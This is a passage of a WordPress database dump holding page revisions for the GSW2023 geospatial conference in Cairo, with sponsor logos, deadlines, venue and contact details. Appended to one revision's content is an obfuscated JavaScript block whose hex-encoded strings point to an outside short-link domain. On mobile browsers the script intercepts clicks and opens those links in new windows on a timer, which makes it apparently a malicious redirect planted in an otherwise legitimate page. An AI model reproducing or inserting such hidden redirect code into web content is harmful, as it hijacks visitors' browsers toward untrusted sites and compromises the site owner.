Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-16 20:29:04','2023-04-16 20:29:04','',3066,'https://gsw2023.com/?p=4057',0,'revision','',0),
(4058,1,'2023-04-16 20:33:58','2023-04-16 20:33:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text 